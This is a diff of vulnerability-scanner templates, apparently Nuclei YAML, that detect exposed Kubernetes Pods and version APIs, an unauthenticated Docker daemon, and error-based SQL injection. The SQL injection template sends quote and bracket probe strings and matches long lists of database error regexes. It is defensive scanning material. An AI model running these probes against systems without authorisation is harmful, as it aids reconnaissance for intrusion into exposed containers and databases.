Kubernetes Pods API author: ilovebinbash,geeknik,0xtavian severity: critical - description: A Kubernetes Pods API was discovered. When the service port is available, unauthenticated users can execute commands inside the container. - reference: - - https://github.com/officialhocc/Kubernetes-Kubelet-RCE - - https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/ + description: When the service port is available, anyone can execute commands inside the container. See https://github.com/officialhocc/Kubernetes-Kubelet-RCE for inspiration. + reference: https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/ tags: k8,unauth,kubernetes,devops - metadata: - max-request: 2 - -http: +requests: - method: GET path: - '{{BaseURL}}/pods' - '{{BaseURL}}/api/v1/pods' - matchers-condition: and matchers: - type: word words: - "apiVersion" - - type: word words: - "application/json" part: header - - type: status status: - 200 - -# Enhanced by mp on 2022/05/20 diff --git a/poc/docker/kubernetes-version.yaml b/poc/docker/kubernetes-version.yaml index cd82e92ef3..60539517e2 100644 --- a/poc/docker/kubernetes-version.yaml +++ b/poc/docker/kubernetes-version.yaml @@ -1,14 +1,9 @@ id: kubernetes-version info: name: Kubernetes Version Exposure - author: raesene,idealphase - description: Searches for exposed Kubernetes API servers which return version information unauthenticated. For Google Kubernetes Engine (GKE) and Amazon Elastic Kubernetes Service (EKS) this template will extract default patch version for you. - reference: - - https://cloud.google.com/kubernetes-engine/docs/release-notes - - https://docs.aws.amazon.com/eks/latest/userguide/kubernetes-versions.html + author: raesene + description: Searches for exposed Kubernetes API servers which return version information unauthenticated severity: info - metadata: - shodan-query: product:"Kubernetes" version:"1.21.5-eks-bc4871b" tags: tech,k8s,kubernetes,devops requests: - method: GET @@ -21,7 +16,3 @@ requests: - "goVersion" - "platform" condition: and - extractors: - - type: json - json: - - '.gitVersion' diff --git a/poc/docker/misconfigured-docker-8900.yaml b/poc/docker/misconfigured-docker-8900.yaml index 6e40631707..b5f5de6aed 100644 --- a/poc/docker/misconfigured-docker-8900.yaml +++ b/poc/docker/misconfigured-docker-8900.yaml @@ -1,9 +1,11 @@ id: misconfigured-docker info: - name: Misconfigured Docker on Default Port + name: Docker Container - Misconfiguration Exposure author: dhiyaneshDK severity: critical - reference: https://madhuakula.com/content/attacking-and-auditing-docker-containers-using-opensource/attacking-docker-containers/misconfiguration.html + description: A Docker container misconfiguration was discovered. The Docker daemon can listen for Docker Engine API requests via three different types of Socket - unix, tcp, and fd. With tcp enabled, the default setup provides un-encrypted and un-authenticated direct access to the Docker daemon. It is conventional to use port 2375 for un-encrypted, and port 2376 for encrypted communication with the daemon. + reference: + - https://madhuakula.com/content/attacking-and-auditing-docker-containers-using-opensource/attacking-docker-containers/misconfiguration.html tags: docker,unauth,devops requests: - method: GET @@ -20,3 +22,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/20 diff --git a/poc/elk/0xelkotsqli.yaml b/poc/elk/0xelkotsqli.yaml index d39d68d605..78257140e3 100644 --- a/poc/elk/0xelkotsqli.yaml +++ b/poc/elk/0xelkotsqli.yaml @@ -1,482 +1,476 @@ -id: error-based-sql-injection - -info: - name: Error based SQL injection [Edit] - author: geeknik,0xelkot - severity: high - description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml. - tags: sqli,generic,error - -requests: - - method: GET - path: - - "{{BaseURL}}'" - - '{{BaseURL}}"' - - "{{BaseURL}}+" - - "{{BaseURL}}-" - - "{{BaseURL}}*" - - "{{BaseURL}}[]" - - "{{BaseURL}}')" - - matchers-condition: and - matchers: - - type: word - words: - - "Adminer" - # False Positive - part: body - negative: true - - - type: regex - regex: - # MySQL - - "SQL syntax.*?MySQL" - - "Warning.*?\\Wmysqli?_" - - "MySQLSyntaxErrorException" - - "valid MySQL result" - - "check the manual that (corresponds to|fits) your MySQL server version" - - "Unknown column '[^ ]+' in 'field list'" - - "MySqlClient\\." - - "com\\.mysql\\.jdbc" - - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" - - "Pdo[./_\\\\]Mysql" - - "MySqlException" - - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" - # MariaDB - - "check the manual that (corresponds to|fits) your MariaDB server version" - # Drizzle - - "check the manual that (corresponds to|fits) your Drizzle server version" - # MemSQL - - "MemSQL does not support this type of query" - - "is not supported by MemSQL" - - "unsupported nested scalar subselect" - # PostgreSQL - - "PostgreSQL.*?ERROR" - - "Warning.*?\\Wpg_" - - "valid PostgreSQL result" - - "Npgsql\\." - - "PG::SyntaxError:" - - "org\\.postgresql\\.util\\.PSQLException" - - "ERROR:\\s\\ssyntax error at or near" - - "ERROR: parser: parse error at or near" - - "PostgreSQL query failed" - - "org\\.postgresql\\.jdbc" - - "Pdo[./_\\\\]Pgsql" - - "PSQLException" - # Microsoft SQL Server - - "Driver.*? SQL[\\-\\_\\ ]*Server" - - "OLE DB.*? SQL Server" - - "\\bSQL Server[^<"]+Driver" - - "Warning.*?\\W(mssql|sqlsrv)_" - - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" - - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" - - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." - - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" - - "\\[SQL Server\\]" - - "ODBC SQL Server Driver" - - "ODBC Driver \\d+ for SQL Server" - - "SQLServer JDBC Driver" - - "com\\.jnetdirect\\.jsql" - - "macromedia\\.jdbc\\.sqlserver" - - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" - - "com\\.microsoft\\.sqlserver\\.jdbc" - - "Pdo[./_\\\\](Mssql|SqlSrv)" - - "SQL(Srv|Server)Exception" - - "Unclosed quotation mark after the character string" - # Microsoft Access - - "Microsoft Access (\\d+ )?Driver" - - "JET Database Engine" - - "Access Database Engine" - - "ODBC Microsoft Access" - - "Syntax error \\(missing operator\\) in query expression" - # Oracle - - "\\bORA-\\d{5}" - - "Oracle error" - - "Oracle.*?Driver" - - "Warning.*?\\W(oci|ora)_" - - "quoted string not properly terminated" - - "SQL command not properly ended" - - "macromedia\\.jdbc\\.oracle" - - "oracle\\.jdbc" - - "Zend_Db_(Adapter|Statement)_Oracle_Exception" - - "Pdo[./_\\\\](Oracle|OCI)" - - "OracleException" - # IBM DB2 - - "CLI Driver.*?DB2" - - "DB2 SQL error" - - "\\bdb2_\\w+\\(" - - "SQLCODE[=:\\d, -]+SQLSTATE" - - "com\\.ibm\\.db2\\.jcc" - - "Zend_Db_(Adapter|Statement)_Db2_Exception" - - "Pdo[./_\\\\]Ibm" - - "DB2Exception" - - "ibm_db_dbi\\.ProgrammingError" - # Informix - - "Warning.*?\\Wifx_" - - "Exception.*?Informix" - - "Informix ODBC Driver" - - "ODBC Informix driver" - - "com\\.informix\\.jdbc" - - "weblogic\\.jdbc\\.informix" - - "Pdo[./_\\\\]Informix" - - "IfxException" - # Firebird - - "Dynamic SQL Error" - - "Warning.*?\\Wibase_" - - "org\\.firebirdsql\\.jdbc" - - "Pdo[./_\\\\]Firebird" - # SQLite - - "SQLite/JDBCDriver" - - "SQLite\\.Exception" - - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" - - "Warning.*?\\W(sqlite_|SQLite3::)" - - "\\[SQLITE_ERROR\\]" - - "SQLite error \\d+:" - - "sqlite3.OperationalError:" - - "SQLite3::SQLException" - - "org\\.sqlite\\.JDBC" - - "Pdo[./_\\\\]Sqlite" - - "SQLiteException" - # SAP MaxDB - - "SQL error.*?POS([0-9]+)" - - "Warning.*?\\Wmaxdb_" - - "DriverSapDB" - - "-3014.*?Invalid end of SQL statement" - - "com\\.sap\\.dbtech\\.jdbc" - - "\\[-3008\\].*?: Invalid keyword or missing delimiter" - # Sybase - - "Warning.*?\\Wsybase_" - - "Sybase message" - - "Sybase.*?Server message" - - "SybSQLException" - - "Sybase\\.Data\\.AseClient" - - "com\\.sybase\\.jdbc" - # Ingres - - "Warning.*?\\Wingres_" - - "Ingres SQLSTATE" - - "Ingres\\W.*?Driver" - - "com\\.ingres\\.gcf\\.jdbc" - # FrontBase - - "Exception (condition )?\\d+\\. Transaction rollback" - - "com\\.frontbase\\.jdbc" - - "Syntax error 1. Missing" - - "(Semantic|Syntax) error [1-4]\\d{2}\\." - # HSQLDB - - "Unexpected end of command in statement \\[" - - "Unexpected token.*?in statement \\[" - - "org\\.hsqldb\\.jdbc" - # H2 - - "org\\.h2\\.jdbc" - - "\\[42000-192\\]" - # MonetDB - - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" - - "\\[MonetDB\\]\\[ODBC Driver" - - "nl\\.cwi\\.monetdb\\.jdbc" - # Apache Derby - - "Syntax error: Encountered" - - "org\\.apache\\.derby" - - "ERROR 42X01" - # Vertica - - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" - - "/vertica/Parser/scan" - - "com\\.vertica\\.jdbc" - - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" - - "com\\.vertica\\.dsi\\.dataengine" - # Mckoi - - "com\\.mckoi\\.JDBCDriver" - - "com\\.mckoi\\.database\\.jdbc" - - "<REGEX_LITERAL>" - # Presto - - "com\\.facebook\\.presto\\.jdbc" - - "io\\.prestosql\\.jdbc" - - "com\\.simba\\.presto\\.jdbc" - - "UNION query has different number of fields: \\d+, \\d+" - # Altibase - - "Altibase\\.jdbc\\.driver" - # MimerSQL - - "com\\.mimer\\.jdbc" - - "Syntax error,[^\\n]+assumed to mean" - # CrateDB - - "io\\.crate\\.client\\.jdbc" - # Cache - - "encountered after end of query" - - "A comparison operator is required here" - # Raima Database Manager - - "-10048: Syntax error" - - "rdmStmtPrepare\\(.+?\\) returned" - # Virtuoso - - "SQ074: Line \\d+:" - - "SR185: Undefined procedure" - - "SQ200: No table " - - "Virtuoso S0002 Error" - - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" - condition: or - - extractors: - - type: regex - name: MySQL - regex: - - "SQL syntax.*?MySQL" - - "Warning.*?\\Wmysqli?_" - - "MySQLSyntaxErrorException" - - "valid MySQL result" - - "check the manual that (corresponds to|fits) your MySQL server version" - - "Unknown column '[^ ]+' in 'field list'" - - "MySqlClient\\." - - "com\\.mysql\\.jdbc" - - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" - - "Pdo[./_\\\\]Mysql" - - "MySqlException" - - "SQLSTATE[\\d+]: Syntax error or access violation" - - - type: regex - name: MariaDB - regex: - - "check the manual that (corresponds to|fits) your MariaDB server version" - - - type: regex - name: Drizzel - regex: - - "check the manual that (corresponds to|fits) your Drizzle server version" - - - type: regex - name: MemSQL - regex: - - "MemSQL does not support this type of query" - - "is not supported by MemSQL" - - "unsupported nested scalar subselect" - - - type: regex - name: PostgreSQL - regex: - - "PostgreSQL.*?ERROR" - - "Warning.*?\\Wpg_" - - "valid PostgreSQL result" - - "Npgsql\\." - - "PG::SyntaxError:" - - "org\\.postgresql\\.util\\.PSQLException" - - "ERROR:\\s\\ssyntax error at or near" - - "ERROR: parser: parse error at or near" - - "PostgreSQL query failed" - - "org\\.postgresql\\.jdbc" - - "Pdo[./_\\\\]Pgsql" - - "PSQLException" - - - type: regex - name: MicrosoftSQLServer - regex: - - "Driver.*? SQL[\\-\\_\\ ]*Server" - - "OLE DB.*? SQL Server" - - "\\bSQL Server[^<"]+Driver" - - "Warning.*?\\W(mssql|sqlsrv)_" - - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" - - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" - - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." - - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" - - "\\[SQL Server\\]" - - "ODBC SQL Server Driver" - - "ODBC Driver \\d+ for SQL Server" - - "SQLServer JDBC Driver" - - "com\\.jnetdirect\\.jsql" - - "macromedia\\.jdbc\\.sqlserver" - - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" - - "com\\.microsoft\\.sqlserver\\.jdbc" - - "Pdo[./_\\\\](Mssql|SqlSrv)" - - "SQL(Srv|Server)Exception" - - "Unclosed quotation mark after the character string" - - - type: regex - name: MicrosoftAccess - regex: - - "Microsoft Access (\\d+ )?Driver" - - "JET Database Engine" - - "Access Database Engine" - - "ODBC Microsoft Access" - - "Syntax error \\(missing operator\\) in query expression" - - - type: regex - name: Oracle - regex: - - "\\bORA-\\d{5}" - - "Oracle error" - - "Oracle.*?Driver" - - "Warning.*?\\W(oci|ora)_" - - "quoted string not properly terminated" - - "SQL command not properly ended" - - "macromedia\\.jdbc\\.oracle" - - "oracle\\.jdbc" - - "Zend_Db_(Adapter|Statement)_Oracle_Exception" - - "Pdo[./_\\\\](Oracle|OCI)" - - "OracleException" - - - type: regex - name: IBMDB2 - regex: - - "CLI Driver.*?DB2" - - "DB2 SQL error" - - "\\bdb2_\\w+\\(" - - "SQLCODE[=:\\d, -]+SQLSTATE" - - "com\\.ibm\\.db2\\.jcc" - - "Zend_Db_(Adapter|Statement)_Db2_Exception" - - "Pdo[./_\\\\]Ibm" - - "DB2Exception" - - "ibm_db_dbi\\.ProgrammingError" - - - type: regex - name: Informix - regex: - - "Warning.*?\\Wifx_" - - "Exception.*?Informix" - - "Informix ODBC Driver" - - "ODBC Informix driver" - - "com\\.informix\\.jdbc" - - "weblogic\\.jdbc\\.informix" - - "Pdo[./_\\\\]Informix" - - "IfxException" - - - type: regex - name: Firebird - regex: - - "Dynamic SQL Error" - - "Warning.*?\\Wibase_" - - "org\\.firebirdsql\\.jdbc" - - "Pdo[./_\\\\]Firebird" - - - type: regex - name: SQLite - regex: - - "SQLite/JDBCDriver" - - "SQLite\\.Exception" - - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" - - "Warning.*?\\W(sqlite_|SQLite3::)" - - "\\[SQLITE_ERROR\\]" - - "SQLite error \\d+:" - - "sqlite3.OperationalError:" - - "SQLite3::SQLException" - - "org\\.sqlite\\.JDBC" - - "Pdo[./_\\\\]Sqlite" - - "SQLiteException" - - - type: regex - name: SAPMaxDB - regex: - - "SQL error.*?POS([0-9]+)" - - "Warning.*?\\Wmaxdb_" - - "DriverSapDB" - - "-3014.*?Invalid end of SQL statement" - - "com\\.sap\\.dbtech\\.jdbc" - - "\\[-3008\\].*?: Invalid keyword or missing delimiter" - - - type: regex - name: Sybase - regex: - - "Warning.*?\\Wsybase_" - - "Sybase message" - - "Sybase.*?Server message" - - "SybSQLException" - - "Sybase\\.Data\\.AseClient" - - "com\\.sybase\\.jdbc" - - - type: regex - name: Ingres - regex: - - "Warning.*?\\Wingres_" - - "Ingres SQLSTATE" - - "Ingres\\W.*?Driver" - - "com\\.ingres\\.gcf\\.jdbc" - - - type: regex - name: FrontBase - regex: - - "Exception (condition )?\\d+\\. Transaction rollback" - - "com\\.frontbase\\.jdbc" - - "Syntax error 1. Missing" - - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." - - - type: regex - name: HSQLDB - regex: - - "Unexpected end of command in statement \\[" - - "Unexpected token.*?in statement \\[" - - "org\\.hsqldb\\.jdbc" - - - type: regex - name: H2 - regex: - - "org\\.h2\\.jdbc" - - "\\[42000-192\\]" - - - type: regex - name: MonetDB - regex: - - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" - - "\\[MonetDB\\]\\[ODBC Driver" - - "nl\\.cwi\\.monetdb\\.jdbc" - - - type: regex - name: ApacheDerby - regex: - - "Syntax error: Encountered" - - "org\\.apache\\.derby" - - "ERROR 42X01" - - - type: regex - name: Vertica - regex: - - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" - - "/vertica/Parser/scan" - - "com\\.vertica\\.jdbc" - - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" - - "com\\.vertica\\.dsi\\.dataengine" - - - type: regex - name: Mckoi - regex: - - "com\\.mckoi\\.JDBCDriver" - - "com\\.mckoi\\.database\\.jdbc" - - "<REGEX_LITERAL>" - - - type: regex - name: Presto - regex: - - "com\\.facebook\\.presto\\.jdbc" - - "io\\.prestosql\\.jdbc" - - "com\\.simba\\.presto\\.jdbc" - - "UNION query has different number of fields: \\d+, \\d+" - - - type: regex - name: Altibase - regex: - - "Altibase\\.jdbc\\.driver" - - - type: regex - name: MimerSQL - regex: - - "com\\.mimer\\.jdbc" - - "Syntax error,[^\\n]+assumed to mean" - - - type: regex - name: CrateDB - regex: - - "io\\.crate\\.client\\.jdbc" - - - type: regex - name: Cache - regex: - - "encountered after end of query" - - "A comparison operator is required here" - - - type: regex - name: RaimaDatabaseManager - regex: - - "-10048: Syntax error" - - "rdmStmtPrepare\\(.+?\\) returned" - - - type: regex - name: Virtuoso - regex: - - "SQ074: Line \\d+:" - - "SR185: Undefined procedure" - - "SQ200: No table " - - "Virtuoso S0002 Error" - - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" +id: error-based-sql-injection + +info: + name: Error based SQL injection + author: geeknik + severity: high + description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml. + tags: sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/'" + + matchers-condition: and + matchers: + - type: word + words: + - "Adminer" + # False Positive + part: body + negative: true + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." + # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - "encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + condition: or + + extractors: + - type: regex + name: MySQL + regex: + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: MariaDB + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: Drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: MemSQL + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: PostgreSQL + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: MicrosoftSQLServer + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: MicrosoftAccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: Oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: IBMDB2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: Informix + regex: + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: Firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + + - type: regex + name: SQLite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: SAPMaxDB + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: Sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: Ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: FrontBase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + + - type: regex + name: HSQLDB + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: H2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: MonetDB + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: ApacheDerby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: Vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: Mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: Presto 